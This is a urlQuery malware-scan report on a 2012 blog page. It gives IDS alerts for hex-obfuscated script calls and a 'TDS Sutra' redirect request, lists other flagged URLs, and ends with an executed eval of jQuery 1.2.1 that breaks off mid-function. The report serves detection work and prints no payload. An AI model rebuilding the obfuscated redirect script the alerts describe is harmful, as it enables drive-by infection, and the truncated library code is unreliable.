Overview

URLhttp://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
IP174.132.115.92
ASNAS21844 ThePlanet.com Internet Services, Inc.
Location United States
Report completed2012-11-16 21:25:18 CET
StatusLoading report..
urlQuery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-16 21:24:40 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of Script Tag % Encoding
2012-11-16 21:24:40 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of document.write % Encoding
2012-11-16 21:24:40 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding
2012-11-16 21:24:40 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding
2012-11-16 21:24:40 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of substr % Encoding
2012-11-16 21:24:40 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of unescape % Encoding
2012-11-16 21:24:42 urlQuery Client 64.74.223.372ET CURRENT_EVENTS TDS Sutra - request in.cgi
2012-11-16 21:24:47 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of substr % Encoding
2012-11-16 21:24:47 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of unescape % Encoding
2012-11-16 21:24:47 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of Script Tag % Encoding
2012-11-16 21:24:47 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of document.write % Encoding
2012-11-16 21:24:47 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding
2012-11-16 21:24:47 174.132.115.92 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 174.132.115.92

Date Alerts / IDS URL IP
2012-12-22 16:20:570 / 3http://meridiancrest.com/twitter-updates-for-2008-06-10174.132.115.92
2012-12-04 18:34:550 / 20http://www.meridiancrest.com/considering-intellectual-property-rights-when-selecting- (...)174.132.115.92
2012-12-04 09:12:070 / 20http://www.meridiancrest.com/all-the-ad-forecasts-add-up-to-less/174.132.115.92
2012-12-04 09:11:570 / 20http://meridiancrest.com/all-the-ad-forecasts-add-up-to-less174.132.115.92
2012-12-03 21:57:490 / 52http://meridiancrest.com/what-we-can-learn-from-facebook-statistics174.132.115.92
2012-12-03 19:44:340 / 13http://www.meridiancrest.com/rss-xplosion-launches/174.132.115.92

Last 6 reports on ASN: AS21844 ThePlanet.com Internet Services, Inc.

Date Alerts / IDS URL IP
2013-03-31 03:45:501 / 0http://40timerskurs.no/classes/apples-hd174.132.147.124
2013-03-31 03:45:451 / 0http://40timerskurs.no/classes/apples-hd174.132.147.124
2013-03-31 03:43:310 / 2http://www.p-dd.biz/downloads/ipod-data-recovery-demo.exe174.122.240.6
2013-03-31 03:40:590 / 2http://www.atopsoft.com/products/autosave/autosave.exe174.120.81.227
2013-03-31 03:39:100 / 2http://andkon.com/arcade/other/interactivebuddy174.132.111.11
2013-03-31 03:16:550 / 0http://3disoftware.com74.53.161.149

Last 6 reports on domain: www.meridiancrest.com

Date Alerts / IDS URL IP
2012-12-04 18:34:550 / 20http://www.meridiancrest.com/considering-intellectual-property-rights-when-selecting-a-domain/174.132.115.92
2012-12-04 09:12:070 / 20http://www.meridiancrest.com/all-the-ad-forecasts-add-up-to-less/174.132.115.92
2012-12-03 19:44:340 / 13http://www.meridiancrest.com/rss-xplosion-launches/174.132.115.92
2012-12-03 05:18:530 / 16http://www.meridiancrest.com/apple-rips-the-postal-service/174.132.115.92
2012-12-02 23:32:480 / 21http://www.meridiancrest.com/easiest-way-to-discover-a-profitable-niche/comment-page-1/174.132.115.92
2012-12-02 23:26:230 / 17http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/174.132.115.92



JavaScript

Executed Scripts (31)


Executed Evals (2)

#1 JavaScript::Eval (size: 39024, repeated: 1)

(function() {
    if (typeof E != "undefined") var w = E;
    var E = window.jQuery = function(a, b) {
            return this instanceof E ? this.init(a, b) : new E(a, b)
        };
    if (typeof $ != "undefined") var D = $;
    window.$ = E;
    var u = /^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/;
    E.fn = E.prototype = {
        init: function(c, a) {
            c = c || document;
            if (typeof c == "string") {
                var m = u.exec(c);
                if (m && (m[1] || !a)) {
                    if (m[1]) c = E.clean([m[1]], a);
                    else {
                        var b = document.getElementById(m[3]);
                        if (b) if (b.id != m[3]) return E().find(c);
                        else {
                            this[0] = b;
                            this.length = 1;
                            return this
                        } else c = []
                    }
                } else return new E(a).find(c)
            } else if (E.isFunction(c)) return new E(document)[E.fn.ready ? "ready" : "load"](c);
            return this.setArray(c.constructor == Array && c || (c.jquery || c.length && c != window && !c.nodeType && c[0] != undefined && c[0].nodeType) && E.makeArray(c) || [c])
        },
        jquery: "1.2.1",
        size: function() {
            return this.length
        },
        length: 0,
        get: function(a) {
            return a == undefined ? E.makeArray(this) : this[a]
        },
        pushStack: function(a) {
            var b = E(a);
            b.prevObject = this;
            return b
        },
        setArray: function(a) {
            this.length = 0;
            Array.prototype.push.apply(this, a);
            return this
        },
        each: function(a, b) {
            return E.each(this, a, b)
        },
        index: function(a) {
            var b = -1;
            this.each(function(i) {
                if (this == a) b = i
            });
            return b
        },
        attr: function(f, d, e) {
            var c = f;
            if (f.constructor == String) if (d == undefined) return this.length && E[e || "attr"](this[0], f) || undefined;
            else {
                c = {};
                c[f] = d
            }
            return this.each(function(a) {
                for (var b in c) E.attr(e ? this.style : this, b, E.prop(this, c[b], e, a, b))
            })
        },
        css: function(b, a) {
            return this.attr(b, a, "curCSS")
        },
        text: function(e) {
            if (typeof e != "object" && e != null) return this.empty().append(document.createTextNode(e));
            var t = "";
            E.each(e || this, function() {
                E.each(this.childNodes, function() {
                    if (this.nodeType != 8) t += this.nodeType != 1 ? this.nodeValue : E.fn.text([this])
                })
            });
            return t
        },
        wrapAll: function(b) {
            if (this[0]) E(b, this[0].ownerDocument).clone().insertBefore(this[0]).map(function() {
                var a = this;
                while (a.firstChild) a = a.firstChild;
                return a
            }).append(this);
            return this
        },
        wrapInner: function(a) {
            return this.each(function() {
                E(this).contents().wrapAll(a)
            })
        },
        wrap: function(a) {
            return this.each(function() {
                E(this).wrapAll(a)
            })
        },
        append: function() {
            return this.domManip(arguments, true, 1, function(a) {
                this.appendChild(a)
            })
        },
        prepend: function() {
            return this.domManip(arguments, true, -1, function(a) {
                this.insertBefore(a, this.firstChild)
            })
        },
        before: function() {
            return this.domManip(arguments, false, 1, function(a) {
                this.parentNode.insertBefore(a, this)
            })
        },
        after: function() {
            return this.domManip(arguments, false, -1, function(a) {
                this.parentNode.insertBefore(a, this.nextSibling)
            })
        },
        end: function() {
            return this.prevObject || E([])
        },
        find: function(t) {
            var b = E.map(this, function(a) {
                return E.find(t, a)
            });
            return this.pushStack(/[^+>] [^+>]/.test(t) || t.indexOf("..") > -1 ? E.unique(b) : b)
        },
        clone: function(e) {
            var f = this.map(function() {
                return this.outerHTML ? E(this.outerHTML)[0] : this.cloneNode(true)
            });
            var d = f.find("*").andSelf().each(function() {
                if (this[F] != undefined) this[F] = null
            });
            if (e === true) this.find("*").andSelf().each(function(i) {
                var c = E.data(this, "events");
                for (var a in c) for (var b in c[a]) E.event.add(d[i], a, c[a][b], c[a][b].data)
            });
            return f
        },
        filter: function(t) {
            return this.pushStack(E.isFunction(t) && E.grep(this, function(b, a) {
                return t.apply(b, [a])
            }) || E.multiFilter(t, this))
        },
        not: function(t) {
            return this.pushStack(t.constructor == String && E.multiFilter(t, this, true) || E.grep(this, function(a) {
                return (t.constructor == Array || t.jquery) ? E.inArray(a, t) < 0 : a != t
            }))
        },
        add: function(t) {
            return this.pushStack(E.merge(this.get(), t.constructor == String ? E(t).get() : t.length != undefined && (!t.nodeName || E.nodeName(t, "form")) ? t : [t]))
        },
        is: function(a) {
            return a ? E.multiFilter(a, this).length > 0 : false
        },
        hasClass: function(a) {
            return this.is("." + a)
        },
        val: function(b) {
            if (b == undefined) {
                if (this.length) {
                    var c = this[0];
                    if (E.nodeName(c, "select")) {
                        var e = c.selectedIndex,
                            a = [],
                            options = c.options,
                            one = c.type == "select-one";
                        if (e < 0) return null;
                        for (var i = one ? e : 0, max = one ? e + 1 : options.length; i < max; i++) {
                            var d = options[i];
                            if (d.selected) {
                                var b = E.browser.msie && !d.attributes["value"].specified ? d.text : d.value;
                                if (one) return b;
                                a.push(b)
                            }
                        }
                        return a
                    } else return this[0].value.replace(/\r/g, "")
                }
            } else return this.each(function() {
                if (b.constructor == Array && /radio|checkbox/.test(this.type)) this.checked = (E.inArray(this.value, b) >= 0 || E.inArray(this.name, b) >= 0);
                else if (E.nodeName(this, "select")) {
                    var a = b.constructor == Array ? b : [b];
                    E("option", this).each(function() {
                        this.selected = (E.inArray(this.value, a) >= 0 || E.inArray(this.text, a) >= 0)
                    });
                    if (!a.length) this.selectedIndex = -1
                } else this.value = b
            })
        },
        html: function(a) {
            return a == undefined ? (this.length ? this[0].innerHTML : null) : this.empty().append(a)
        },
        replaceWith: function(a) {
            return this.after(a).remove()
        },
        eq: function(i) {
            return this.slice(i, i + 1)
        },
        slice: function() {
            return this.pushStack(Array.prototype.slice.apply(this, arguments))
        },
        map: function(b) {
            return this.pushStack(E.map(this, function(a, i) {
                return b.call(a, i, a)
            }))
        },
        andSelf: function() {
            return this.add(this.prevObject)
        },
        domManip: function(f, d, g, e) {
            var c = this.length > 1,
                a;
            return this.each(function() {
                if (!a) {
                    a = E.clean(f, this.ownerDocument);
                    if (g < 0) a.reverse()
                }
                var b = this;
                if (d && E.nodeName(this, "table") && E.nodeName(a[0], "tr")) b = this.getElementsByTagName("tbody")[0] || this.appendChild(document.createElement("tbody"));
                E.each(a, function() {
                    var a = c ? this.cloneNode(true) : this;
                    if (!evalScript(0, a)) e.call(b, a)
                })
            })
        }
    };

    function evalScript(i, b) {
        var a = E.nodeName(b, "script");
        if (a) {
            if (b.src) E.ajax({
                url: b.src,
                async: false,
                dataType: "script"
            });
            else E.globalEval(b.text || b.textContent || b.innerHTML || "");
            if (b.parentNode) b.parentNode.removeChild(b)
        } else if (b.nodeType == 1) E("script", b).each(evalScript);
        return a
    }
    E.extend = E.fn.extend = function() {
        var c = arguments[0] || {},
            a = 1,
            al = arguments.length,
            deep = false;
        if (c.constructor == Boolean) {
            deep = c;
            c = arguments[1] || {}
        }
        if (al == 1) {
            c = this;
            a = 0
        }
        var b;
        for (; a < al; a++) if ((b = arguments[a]) != null) for (var i in b) {
            if (c == b[i]) continue;
            if (deep && typeof b[i] == 'object' && c[i]) E.extend(c[i], b[i]);
            else if (b[i] != undefined) c[i] = b[i]
        }
        return c
    };
    var F = "jQuery" + (new Date()).getTime(),
        uuid = 0,
        win = {};
    E.extend({
        noConflict: function(a) {
            window.$ = D;
            if (a) window.jQuery = w;
            return E
        },
        isFunction: function(a) {
            return !!a && typeof a != "string" && !a.nodeName && a.constructor != Array && /function/i.test(a + "")
        },
        isXMLDoc: function(a) {
            return a.documentElement && !a.body || a.tagName && a.ownerDocument && !a.ownerDocument.body
        },
        globalEval: function(a) {
            a = E.trim(a);
            if (a) {
                if (window.execScript) window.execScript(a);
                else if (E.browser.safari) window.setTimeout(a, 0);
                else eval.call(window, a)
            }
        },
        nodeName: function(b, a) {
            return b.nodeName && b.nodeName.toUpperCase() == a.toUpperCase()
        },
        cache: {},
        data: function(c, d, b) {
            c = c == window ? win : c;
            var a = c[F];
            if (!a) a = c[F] = ++uuid;
            if (d && !E.cache[a]) E.cache[a] = {};
            if (b != undefined) E.cache[a][d] = b;
            return d ? E.cache[a][d] : a
        },
        removeData: function(c, b) {
            c = c == window ? win : c;
            var a = c[F];
            if (b) {
                if (E.cache[a]) {
                    delete E.cache[a][b];
                    b = "";
                    for (b in E.cache[a]) break;
                    if (!b) E.removeData(c)
                }
            } else {
                try {
                    delete c[F]
                } catch (e) {
                    if (c.removeAttribute) c.removeAttribute(F)
                }
                delete E.cache[a]
            }
        },
        each: function(a, b, c) {
            if (c) {
                if (a.length == undefined) for (var i in a) b.apply(a[i], c);
                else for (var i = 0, ol = a.length; i < ol; i++) if (b.apply(a[i], c) === false) break
            } else {
                if (a.length == undefined) for (var i in a) b.call(a[i], i, a[i]);
                else for (var i = 0, ol = a.length, val = a[0]; i < ol && b.call(val, i, val) !== false; val = a[++i]) {}
            }
            return a
        },
        prop: function(c, b, d, e, a) {
            if (E.isFunction(b)) b = b.call(c, [e]);
            var f = /z-?index|font-?weight|opacity|zoom|line-?height/i;
            return b && b.constructor == Number && d == "curCSS" && !f.test(a) ? b + "px" : b
        },
        className: {
            add: function(b, c) {
                E.each((c || "").split(/\s+/), function(i, a) {
                    if (!E.className.has(b.className, a)) b.className += (b.className ? " " : "") + a
                })
            },
            remove: function(b, c) {
                b.className = c != undefined ? E.grep(b.className.split(/\s+/), function(a) {
                    return !E.className.has(c, a)
                }).join(" ") : ""
            },
            has: function(t, c) {
                return E.inArray(c, (t.className || t).toString().split(/\s+/)) > -1
            }
        },
        swap: function(e, o, f) {
            for (var i in o) {
                e.style["old" + i] = e.style[i];
                e.style[i] = o[i]
            }
            f.apply(e, []);
            for (var i in o) e.style[i] = e.style["old" + i]
        },
        css: function(e, p) {
            if (p == "height" || p == "width") {
                var b = {},
                    oHeight, oWidth, d = ["Top", "Bottom", "Right", "Left"];
                E.each(d, function() {
                    b["padding" + this] = 0;
                    b["border" + this + "Width"] = 0
                });
                E.swap(e, b, function() {
                    if (E(e).is(':visible')) {
                        oHeight = e.offsetHeight;
                        oWidth = e.offsetWidth
                    } else {
                        e = E(e.cloneNode(true)).find(":radio").removeAttr("checked").end().css({
                            visibility: "hidden",
                            position: "absolute",
                            display: "block",
                            right: "0",
                            left: "0"
                        }).appendTo(e.parentNode)[0];
                        var a = E.css(e.parentNode, "position") || "static";
                        if (a == "static") e.parentNode.style.position = "relative";
                        oHeight = e.clientHeight;
                        oWidth = e.clientWidth;
                        if (a == "static") e.parentNode.style.position = "static";
                        e.parentNode.removeChild(e)
                    }
                });
                return p == "height" ? oHeight : oWidth
            }
            return E.curCSS(e, p)
        },
        curCSS: function(h, j, i) {
            var g, stack = [],
                swap = [];

            function color(a) {
                if (!E.browser.safari) return false;
                var b = document.defaultView.getComputedStyle(a, null);
                return !b || b.getPropertyValue("color") == ""
            }
            if (j == "opacity" && E.browser.msie) {
                g = E.attr(h.style, "opacity");
                return g == "" ? "1" : g
            }
            if (j.match(/float/i)) j = y;
            if (!i && h.style[j]) g = h.style[j];
            else if (document.defaultView && document.defaultView.getComputedStyle) {
                if (j.match(/float/i)) j = "float";
                j = j.replace(/([A-Z])/g, "-$1").toLowerCase();
                var d = document.defaultView.getComputedStyle(h, null);
                if (d && !color(h)) g = d.getPropertyValue(j);
                else {
                    for (var a = h; a && color(a); a = a.parentNode) stack.unshift(a);
                    for (a = 0; a < stack.length; a++) if (color(stack[a])) {
                        swap[a] = stack[a].style.display;
                        stack[a].style.display = "block"
                    }
                    g = j == "display" && swap[stack.length - 1] != null ? "none" : document.defaultView.getComputedStyle(h, null).getPropertyValue(j) || "";
                    for (a = 0; a < swap.length; a++) if (swap[a] != null) stack[a].style.display = swap[a]
                }
                if (j == "opacity" && g == "") g = "1"
            } else if (h.currentStyle) {
                var f = j.replace(/\-(\w)/g, function(m, c) {
                    return c.toUpperCase()
                });
                g = h.currentStyle[j] || h.currentStyle[f];
                if (!/^\d+(px)?$/i.test(g) && /^\d/.test(g)) {
                    var k = h.style.left;
                    var e = h.runtimeStyle.left;
                    h.runtimeStyle.left = h.currentStyle.left;
                    h.style.left = g || 0;
                    g = h.style.pixelLeft + "px";
                    h.style.left = k;
                    h.runtimeStyle.left = e
                }
            }
            return g
        },
        clean: function(a, e) {
            var r = [];
            e = e || document;
            E.each(a, function(i, d) {
                if (!d) return;
                if (d.constructor == Number) d = d.toString();
                if (typeof d == "string") {
                    d = d.replace(/(<(\w+)[^>]*?)\/>/g, function(m, a, b) {
                        return b.match(/^(abbr|br|col|img|input|link|meta|param|hr|area)$/i) ? m : a + "></" + b + ">"
                    });
                    var s = E.trim(d).toLowerCase(),
                        div = e.createElement("div"),
                        tb = [];
                    var c = !s.indexOf("<opt") && [1, "<select>", "</select>"] || !s.indexOf("<leg") && [1, "<fieldset>", "</fieldset>"] || s.match(/^<(thead|tbody|tfoot|colg|cap)/) && [1, "<table>", "</table>"] || !s.indexOf("<tr") && [2, "<table><tbody>", "</tbody></table>"] || (!s.indexOf("<td") || !s.indexOf("<th")) && [3, "<table><tbody><tr>", "</tr></tbody></table>"] || !s.indexOf("<col") && [2, "<table><tbody></tbody><colgroup>", "</colgroup></table>"] || E.browser.msie && [1, "div<div>", "</div>"] || [0, "", ""];
                    div.innerHTML = c[1] + d + c[2];
                    while (c[0]--) div = div.lastChild;
                    if (E.browser.msie) {
                        if (!s.indexOf("<table") && s.indexOf("<tbody") < 0) tb = div.firstChild && div.firstChild.childNodes;
                        else if (c[1] == "<table>" && s.indexOf("<tbody") < 0) tb = div.childNodes;
                        for (var n = tb.length - 1; n >= 0; --n) if (E.nodeName(tb[n], "tbody") && !tb[n].childNodes.length) tb[n].parentNode.removeChild(tb[n]);
                        if (/^\s/.test(d)) div.insertBefore(e.createTextNode(d.match(/^\s*/)[0]), div.firstChild)
                    }
                    d = E.makeArray(div.childNodes)
                }
                if (0 === d.length && (!E.nodeName(d, "form") && !E.nodeName(d, "select"))) return;
                if (d[0] == undefined || E.nodeName(d, "form") || d.options) r.push(d);
                else r = E.merge(r, d)
            });
            return r
        },
        attr: function(c, d, a) {
            var e = E.isXMLDoc(c) ? {} : E.props;
            if (d == "selected" && E.browser.safari) c.parentNode.selectedIndex;
            if (e[d]) {
                if (a != undefined) c[e[d]] = a;
                return c[e[d]]
            } else if (E.browser.msie && d == "style") return E.attr(c.style, "cssText", a);
            else if (a == undefined && E.browser.msie && E.nodeName(c, "form") && (d == "action" || d == "method")) return c.getAttributeNode(d).nodeValue;
            else if (c.tagName) {
                if (a != undefined) {
                    if (d == "type" && E.nodeName(c, "input") && c.parentNode) throw "type property can't be changed";
                    c.setAttribute(d, a)
                }
                if (E.browser.msie && /href|src/.test(d) && !E.isXMLDoc(c)) return c.getAttribute(d, 2);
                return c.getAttribute(d)
            } else {
                if (d == "opacity" && E.browser.msie) {
                    if (a != undefined) {
                        c.zoom = 1;
                        c.filter = (c.filter || "").replace(/alpha\([^)]*\)/, "") + (parseFloat(a).toString() == "NaN" ? "" : "alpha(opacity=" + a * 100 + ")")
                    }
                    return c.filter ? (parseFloat(c.filter.match(/opacity=([^)]*)/)[1]) / 100).toString() : ""
                }
                d = d.replace(/-([a-z])/ig, function(z, b) {
                    return b.toUpperCase()
                });
                if (a != undefined) c[d] = a;
                return c[d]
            }
        },
        trim: function(t) {
            return (t || "").replace(/^\s+|\s+$/g, "")
        },
        makeArray: function(a) {
            var r = [];
            if (typeof a != "array") for (var i = 0, al = a.length; i < al; i++) r.push(a[i]);
            else r = a.slice(0);
            return r
        },
        inArray: function(b, a) {
            for (var i = 0, al = a.length; i < al; i++) if (a[i] == b) return i;
            return -1
        },
        merge: function(a, b) {
            if (E.browser.msie) {
                for (var i = 0; b[i]; i++) if (b[i].nodeType != 8) a.push(b[i])
            } else for (var i = 0; b[i]; i++) a.push(b[i]);
            return a
        },
        unique: function(b) {
            var r = [],
                done = {};
            try {
                for (var i = 0, fl = b.length; i < fl; i++) {
                    var a = E.data(b[i]);
                    if (!done[a]) {
                        done[a] = true;
                        r.push(b[i])
                    }
                }
            } catch (e) {
                r = b
            }
            return r
        },
        grep: function(b, a, c) {
            if (typeof a == "string") a = eval("false||function(a,i){return " + a + "}");
            var d = [];
            for (var i = 0, el = b.length; i < el; i++) if (!c && a(b[i], i) || c && !a(b[i], i)) d.push(b[i]);
            return d
        },
        map: function(c, b) {
            if (typeof b == "string") b = eval("false||function(a){return " + b + "}");
            var d = [];
            for (var i = 0, el = c.length; i < el; i++) {
                var a = b(c[i], i);
                if (a !== null && a != undefined) {
                    if (a.constructor != Array) a = [a];
                    d = d.concat(a)
                }
            }
            return d
        }
    });
    var v = navigator.userAgent.toLowerCase();
    E.browser = {
        version: (v.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/) || [])[1],
        safari: /webkit/.test(v),
        opera: /opera/.test(v),
        msie: /msie/.test(v) && !/opera/.test(v),
        mozilla: /mozilla/.test(v) && !/(compatible|webkit)/.test(v)
    };
    var y = E.browser.msie ? "styleFloat" : "cssFloat";
    E.extend({
        boxModel: !E.browser.msie || document.compatMode == "CSS1Compat",
        styleFloat: E.browser.msie ? "styleFloat" : "cssFloat",
        props: {
            "for": "htmlFor",
            "class": "className",
            "float": y,
            cssFloat: y,
            styleFloat: y,
            innerHTML: "innerHTML",
            className: "className",
            value: "value",
            disabled: "disabled",
            checked: "checked",
            readonly: "readOnly",
            selected: "selected",
            maxlength: "maxLength"
        }
    });
    E.each({
        parent: "a.parentNode",
        parents: "jQuery.dir(a,'parentNode')",
        next: "jQuery.nth(a,2,'nextSibling')",
        prev: "jQuery.nth(a,2,'previousSibling')",
        nextAll: "jQuery.dir(a,'nextSibling')",
        prevAll: "jQuery.dir(a,'previousSibling')",
        siblings: "jQuery.sibling(a.parentNode.firstChild,a)",
        children: "jQuery.sibling(a.firstChild)",
        contents: "jQuery.nodeName(a,'iframe')?a.contentDocument||a.contentWindow.document:jQuery.makeArray(a.childNodes)"
    }, function(i, n) {
        E.fn[i] = function(a) {
            var b = E.map(this, n);
            if (a && typeof a == "string") b = E.multiFilter(a, b);
            return this.pushStack(E.unique(b))
        }
    });
    E.each({
        appendTo: "append",
        prependTo: "prepend",
        insertBefore: "before",
        insertAfter: "after",
        replaceAll: "replaceWith"
    }, function(i, n) {
        E.fn[i] = function() {
            var a = arguments;
            return this.each(function() {
                for (var j = 0, al = a.length; j < al; j++) E(a[j])[n](this)
            })
        }
    });
    E.each({
        removeAttr: function(a) {
            E.attr(this, a, "");
            this.removeAttribute(a)
        },
        addClass: function(c) {
            E.className.add(this, c)
        },
        removeClass: function(c) {
            E.className.remove(this, c)
        },
        toggleClass: function(c) {
            E.className[E.className.has(this, c) ? "remove" : "add"](this, c)
        },
        remove: function(a) {
            if (!a || E.filter(a, [this]).r.length) {
                E.removeData(this);
                this.parentNode.removeChild(this)
            }
        },
        empty: function() {
            E("*", this).each(function() {
                E.removeData(this)
            });
            while (this.firstChild) this.removeChild(this.firstChild)
        }
    }, function(i, n) {
        E.fn[i] = function() {
            return this.each(n, arguments)
        }
    });
    E.each(["Height", "Width"], function(i, a) {
        var n = a.toLowerCase();
        E.fn[n] = function(h) {
            return this[0] == window ? E.browser.safari && self["inner" + a] || E.boxModel && Math.max(document.documentElement["client" + a], document.body["client" + a]) || document.body["client" + a] : this[0] == document ? Math.max(document.body["scroll" + a], document.body["offset" + a]) : h == undefined ? (this.length ? E.css(this[0], n) : null) : this.css(n, h.constructor == String ? h : h + "px")
        }
    });
    var C = E.browser.safari && parseInt(E.browser.version) < 417 ? "(?:[\\w*_-]|\\\\.)" : "(?:[\\w\u0128-\uFFFF*_-]|\\\\.)",
        quickChild = new RegExp("^>\\s*(" + C + "+)"),
        quickID = new RegExp("^(" + C + "+)(#)(" + C + "+)"),
        quickClass = new RegExp("^([#.]?)(" + C + "*)");
    E.extend({
        expr: {
            "": "m[2]=='*'||jQuery.nodeName(a,m[2])",
            "#": "a.getAttribute('id')==m[2]",
            ":": {
                lt: "i<m[3]-0",
                gt: "i>m[3]-0",
                nth: "m[3]-0==i",
                eq: "m[3]-0==i",
                first: "i==0",
                last: "i==r.length-1",
                even: "i%2==0",
                odd: "i%2",
                "first-child": "a.parentNode.getElementsByTagName('*')[0]==a",
                "last-child": "jQuery.nth(a.parentNode.lastChild,1,'previousSibling')==a",
                "only-child": "!jQuery.nth(a.parentNode.lastChild,2,'previousSibling')",
                parent: "a.firstChild",
                empty: "!a.firstChild",
                contains: "(a.textContent||a.innerText||jQuery(a).text()||'').indexOf(m[3])>=0",
                visible: '"hidden"!=a.type&&jQuery.css(a,"display")!="none"&&jQuery.css(a,"visibility")!="hidden"',
                hidden: '"hidden"==a.type||jQuery.css(a,"display")=="none"||jQuery.css(a,"visibility")=="hidden"',
                enabled: "!a.disabled",
                disabled: "a.disabled",
                checked: "a.checked",
                selected: "a.selected||jQuery.attr(a,'selected')",
                text: "'text'==a.type",
                radio: "'radio'==a.type",
                checkbox: "'checkbox'==a.type",
                file: "'file'==a.type",
                password: "'password'==a.type",
                submit: "'submit'==a.type",
                image: "'image'==a.type",
                reset: "'reset'==a.type",
                button: '"button"==a.type||jQuery.nodeName(a,"button")',
                input: "/input|select|textarea|button/i.test(a.nodeName)",
                has: "jQuery.find(m[3],a).length",
                header: "/h\\d/i.test(a.nodeName)",
                animated: "jQuery.grep(jQuery.timers,function(fn){return a==fn.elem;}).length"
            }
        },
        parse: [/^(\[) *@?([\w-]+) *([!*$^~=]*) *('?"?)(.*?)\4 *\]/, /^(:)([\w-]+)\("?'?(.*?(\(.*?\))?[^(]*?)"?'?\)/, new RegExp("^([:.#]*)(" + C + "+)")],
        multiFilter: function(a, c, b) {
            var d, cur = [];
            while (a && a != d) {
                d = a;
                var f = E.filter(a, c, b);
                a = f.t.replace(/^\s*,\s*/, "");
                cur = b ? c = f.r : E.merge(cur, f.r)
            }
            return cur
        },
        find: function(t, o) {
            if (typeof t != "string") return [t];
            if (o && !o.nodeType) o = null;
            o = o || document;
            var d = [o],
                done = [],
                last;
            while (t && last != t) {
                var r = [];
                last = t;
                t = E.trim(t);
                var l = false;
                var g = quickChild;
                var m = g.exec(t);
                if (m) {
                    var p = m[1].toUpperCase();
                    for (var i = 0; d[i]; i++) for (var c = d[i].firstChild; c; c = c.nextSibling) if (c.nodeType == 1 && (p == "*" || c.nodeName.toUpperCase() == p.toUpperCase())) r.push(c);
                    d = r;
                    t = t.replace(g, "");
                    if (t.indexOf(" ") == 0) continue;
                    l = true
                } else {
                    g = /^([>+~])\s*(\w*)/i;
                    if ((m = g.exec(t)) != null) {
                        r = [];
                        var p = m[2],
                            merge = {};
                        m = m[1];
                        for (var j = 0, rl = d.length; j < rl; j++) {
                            var n = m == "~" || m == "+" ? d[j].nextSibling : d[j].firstChild;
                            for (; n; n = n.nextSibling) if (n.nodeType == 1) {
                                var h = E.data(n);
                                if (m == "~" && merge[h]) break;
                                if (!p || n.nodeName.toUpperCase() == p.toUpperCase()) {
                                    if (m == "~") merge[h] = true;
                                    r.push(n)
                                }
                                if (m == "+") break
                            }
                        }
                        d = r;
                        t = E.trim(t.replace(g, ""));
                        l = true
                    }
                }
                if (t && !l) {
                    if (!t.indexOf(",")) {
                        if (o == d[0]) d.shift();
                        done = E.merge(done, d);
                        r = d = [o];
                        t = " " + t.substr(1, t.length)
                    } else {
                        var k = quickID;
                        var m = k.exec(t);
                        if (m) {
                            m = [0, m[2], m[3], m[1]]
                        } else {
                            k = quickClass;
                            m = k.exec(t)
                        }
                        m[2] = m[2].replace(/\\/g, "");
                        var f = d[d.length - 1];
                        if (m[1] == "#" && f && f.getElementById && !E.isXMLDoc(f)) {
                            var q = f.getElementById(m[2]);
                            if ((E.browser.msie || E.browser.opera) && q && typeof q.id == "string" && q.id != m[2]) q = E('[@id="' + m[2] + '"]', f)[0];
                            d = r = q && (!m[3] || E.nodeName(q, m[3])) ? [q] : []
                        } else {
                            for (var i = 0; d[i]; i++) {
                                var a = m[1] == "#" && m[3] ? m[3] : m[1] != "" || m[0] == "" ? "*" : m[2];
                                if (a == "*" && d[i].nodeName.toLowerCase() == "object") a = "param";
                                r = E.merge(r, d[i].getElementsByTagName(a))
                            }
                            if (m[1] == ".") r = E.classFilter(r, m[2]);
                            if (m[1] == "#") {
                                var e = [];
                                for (var i = 0; r[i]; i++) if (r[i].getAttribute("id") == m[2]) {
                                    e = [r[i]];
                                    break
                                }
                                r = e
                            }
                            d = r
                        }
                        t = t.replace(k, "")
                    }
                }
                if (t) {
                    var b = E.filter(t, r);
                    d = r = b.r;
                    t = E.trim(b.t)
                }
            }
            if (t) d = [];
            if (d && o == d[0]) d.shift();
            done = E.merge(done, d);
            return done
        },
        classFilter: function(r, m, a) {
            m = " " + m + " ";
            var c = [];
            for (var i = 0; r[i]; i++) {
                var b = (" " + r[i].className + " ").indexOf(m) >= 0;
                if (!a && b || a && !b) c.push(r[i])
            }
            return c
        },
        filter: function(t, r, h) {
            var d;
            while (t && t != d) {
                d = t;
                var p = E.parse,
                    m;
                for (var i = 0; p[i]; i++) {
                    m = p[i].exec(t);
                    if (m) {
                        t = t.substring(m[0].length);
                        m[2] = m[2].replace(/\\/g, "");
                        break
                    }
                }
                if (!m) break;
                if (m[1] == ":" && m[2] == "not") r = E.filter(m[3], r, true).r;
                else if (m[1] == ".") r = E.classFilter(r, m[2], h);
                else if (m[1] == "[") {
                    var g = [],
                        type = m[3];
                    for (var i = 0, rl = r.length; i < rl; i++) {
                        var a = r[i],
                            z = a[E.props[m[2]] || m[2]];
                        if (z == null || /href|src|selected/.test(m[2])) z = E.attr(a, m[2]) || '';
